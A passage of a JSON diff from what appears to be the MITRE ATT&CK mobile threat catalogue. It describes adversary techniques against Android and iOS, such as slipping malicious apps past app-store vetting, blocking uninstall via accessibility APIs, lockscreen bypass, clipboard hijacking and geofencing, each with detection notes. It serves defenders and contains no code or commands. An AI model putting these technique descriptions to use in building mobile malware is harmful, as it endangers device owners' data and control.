J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved December 12, 2016." + }, + { + "source_name": "Konoth", + "url": "http://www.vvdveen.com/publications/BAndroid.pdf", + "description": "Radhesh Krishnan Konoth, Victor van der Veen, and Herbert Bos. (n.d.). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved December 12, 2016." + }, + { + "source_name": "Petsas", + "url": "http://dl.acm.org/citation.cfm?id=2592796", + "description": "Thanasis Petsas, Giannis Voyatzis, Elias Athanasopoulos, Michalis Polychronakis, Sotiris Ioannidis. (2014, April). Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware. Retrieved December 12, 2016." + }, + { + "source_name": "Wang", + "url": "https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013, August). Jekyll on iOS: When Benign Apps Become Evil. Retrieved December 9, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-4" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-16" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-17" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-20" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-21" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-22" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", + "modified": "2022-04-06T15:41:33.827Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deliver Malicious App via Authorized App Store", + "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution can identify the presence of unwanted or known insecure or malicious apps on devices.\n* Developers can scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:55:09.397Z", + "name": "Data Encrypted for Impact", + "description": "An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "3.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "created": "2017-10-25T14:48:10.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1471", + "external_id": "T1471" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html", + "external_id": "APP-28" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:36.502Z", + "name": "Prevent Application Removal", + "description": "Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.\n\nAdversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of device administrators and applications that have registered accessibility services in device settings. Users can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "created": "2022-04-01T18:44:32.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/001", + "external_id": "T1629.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "created": "2017-10-25T14:48:33.574Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1421", + "url": "https://attack.mitre.org/techniques/T1421" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network. \n\n \n\nThis is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs: \n\n \n\n* `WifiInfo` for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the `WiFiInfo` API requires the application to hold the `ACCESS_FINE_LOCATION` permission. \n\n* `BluetoothAdapter` for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime. \n\n* For Android versions prior to Q, applications can use the `TelephonyManager.getNeighboringCellInfo()` method. For Q and later, applications can use the `TelephonyManager.getAllCellInfo()` method. Both methods require the application hold the `ACCESS_FINE_LOCATION` permission.", + "modified": "2022-03-31T16:31:12.821Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "System Network Connections Discovery", + "x_mitre_detection": "System Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "created": "2017-10-25T14:48:24.488Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1461", + "url": "https://attack.mitre.org/techniques/T1461" + }, + { + "source_name": "Wired-AndroidBypass", + "url": "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", + "description": "Andy Greenberg. (2015, September 15). Hack Brief: Emergency Number Hack Bypasses Android Lock Screens. Retrieved December 23, 2016." + }, + { + "source_name": "Kaspersky-iOSBypass", + "url": "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/", + "description": "Chris Brook. (2016, November 17). iOS 10 Passcode Bypass Can Access Photos, Contacts. Retrieved December 23, 2016." + }, + { + "source_name": "TheSun-FaceID", + "url": "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/", + "description": "Sean Keach. (2018, February 15). Brit mates BREAK Apple’s face unlock and vow to never buy iPhone again. Retrieved September 18, 2018." + }, + { + "source_name": "SRLabs-Fingerprint", + "url": "https://srlabs.de/bites/spoofing-fingerprints/", + "description": "SRLabs. (n.d.). Fingerprints are not fit for secure device unlocking. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:\n\n* Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism. Both iOS and Android partly mitigate this attack by requiring the device’s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID)\n* Unlock code bypass: An adversaries could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts.\n* Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)\n", + "modified": "2022-04-19T15:36:12.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Lockscreen Bypass", + "x_mitre_detection": "Users can see if someone is watching them type in their device passcode.", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e083305c-49e7-4c87-aae8-9689213bffbe", + "created": "2020-12-16T20:16:07.673Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1605", + "url": "https://attack.mitre.org/techniques/T1605" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.\n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.", + "modified": "2022-03-30T14:00:45.099Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Command-Line Interface", + "x_mitre_detection": "Command-Line Interface execution can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:40:11.937Z", + "name": "Contact List", + "description": "Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application’s manifest, or `NSContactsUsageDescription` in an iOS application’s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "created": "2022-04-01T13:17:52.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/003", + "external_id": "T1636.003" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "created": "2019-10-10T15:12:42.790Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1533", + "url": "https://attack.mitre.org/techniques/T1533" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-41" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration. \n\n \n\nAccess to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions. \n\n ", + "modified": "2022-04-01T16:53:27.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Local System", + "x_mitre_detection": "Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:34:51.917Z", + "name": "Account Access Removal", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could closely scrutinize applications that request Device Administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "created": "2022-04-06T13:29:47.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1640", + "external_id": "T1640" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "created": "2017-10-25T14:48:19.265Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1426", + "url": "https://attack.mitre.org/techniques/T1426" + }, + { + "source_name": "Android-Build", + "url": "https://developer.android.com/reference/android/os/Build", + "description": "Android. (n.d.). Build. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-12" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions. \n\n \n\nOn Android, much of this information is programmatically accessible to applications through the `android.os.Build` class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running. ", + "modified": "2022-04-11T19:21:34.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "System Information Discovery", + "x_mitre_detection": "System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--e30cc912-7ea1-4683-9219-543b86cbdec9", + "type": "attack-pattern", + "created": "2017-10-25T14:48:28.786Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1442", + "external_id": "T1442" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Fake Developer Accounts", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e399430e-30b7-48c5-b70a-f44dc8c175cb", + "created": "2019-07-26T14:15:31.451Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1510", + "url": "https://attack.mitre.org/techniques/T1510" + }, + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." + }, + { + "source_name": "Dr.Webb Clipboard Modification origin August 2018", + "url": "https://vms.drweb.com/virus/?i=17517750", + "description": "Dr.Webb. (2018, August 8). Android.Clipper.1.origin. Retrieved July 26, 2019." + }, + { + "source_name": "Dr.Webb Clipboard Modification origin2 August 2018", + "url": "https://vms.drweb.com/virus/?i=17517761", + "description": "Dr.Webb. (2018, August 8). Android.Clipper.2.origin. Retrieved July 26, 2019." + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019." + }, + { + "source_name": "Welivesecurity Clipboard Modification February 2019", + "url": "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", + "description": "Lukáš Štefanko. (2019, February 8). First clipper malware discovered on Google Play. Retrieved July 26, 2019." + }, + { + "source_name": "Syracuse Clipboard Modification 2014", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/clipboard_attack_dimva2014.pdf", + "description": "Zhang, X; Du, W. (2014, January). Attacks on Android Clipboard. Retrieved July 26, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)\n\nAdversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "modified": "2022-04-06T13:41:17.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Clipboard Modification", + "x_mitre_detection": "Modifying clipboard content can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "created": "2019-10-10T15:00:44.181Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1532", + "url": "https://attack.mitre.org/techniques/T1532" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. \n\n \n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, programming library, or custom algorithm. ", + "modified": "2022-04-01T15:01:02.140Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Archive Collected Data", + "x_mitre_detection": "Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:14.240Z", + "name": "Geofencing", + "description": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)\n\n[Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements. \n\nOne method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include \"Allow only while using the app\", which will effectively prohibit background location collection. \n\nSimilarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground. \n\n[Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can review which applications have location permissions in the operating system’s settings menu. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. Application vetting services can detect unnecessary and potentially abused location permissions or API calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "created": "2022-03-30T20:36:03.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1627/001", + "external_id": "T1627.001" + }, + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e4c347e9-fb91-4bc5-83b8-391e389131e2", + "created": "2019-07-10T15:18:16.753Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1507", + "url": "https://attack.mitre.org/techniques/T1507" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use device sensors 